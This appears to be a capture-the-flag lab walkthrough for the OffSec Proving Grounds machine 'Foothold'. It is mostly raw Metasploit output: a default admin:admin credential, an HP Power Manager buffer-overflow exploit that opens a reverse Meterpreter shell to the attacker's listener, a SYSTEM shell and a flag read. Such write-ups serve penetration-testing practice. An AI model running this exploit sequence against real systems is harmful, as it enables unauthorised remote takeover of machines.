Foothold | OffSec Proving Grounds

admin:admin

msf6 > search HP Power Manager 

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/hp_power_manager_filename       2011-10-19       normal     No     HP Power Manager 'formExportDataLogs' Buffer Overflow
   1  exploit/windows/http/hpe_sim_76_amf_deserialization  2020-12-15       excellent  Yes    HPE Systems Insight Manager AMF Deserialization RCE
   2    \_ target: Windows Command                         .                .          .      .
   3    \_ target: Windows Powershell                      .                .          .      .
   4  exploit/windows/http/hp_power_manager_login          2009-11-04       average    No     Hewlett-Packard Power Manager Administration Buffer Overflow


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/http/hp_power_manager_login

msf6 > use 0

msf6 exploit(windows/http/hp_power_manager_filename) > exploit 

[*] Started reverse TCP handler on 192.168.45.204:4444 
[*] Generating payload...
[*] Trying target Windows XP SP3 / Win Server 2003 SP0...
[*] Sending stage (176198 bytes) to 192.168.166.45
[*] Meterpreter session 1 opened (192.168.45.204:4444 -> 192.168.166.45:49212) at 2024-08-15 21:34:40 -0500
[*] Payload sent! Go grab a coffee, the CPU is gonna work hard for you! :)

meterpreter > shell
Process 3604 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
1bde53060c24f53720c1de24105f9db4

C:\Windows\system32>ipconfig 
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::5558:ac39:bda7:b9ab%15
   IPv4 Address. . . . . . . . . . . : 192.168.166.45
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.166.254

Tunnel adapter Reusable ISATAP Interface {AD5249E3-105D-452D-AF94-6E3E29548657}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :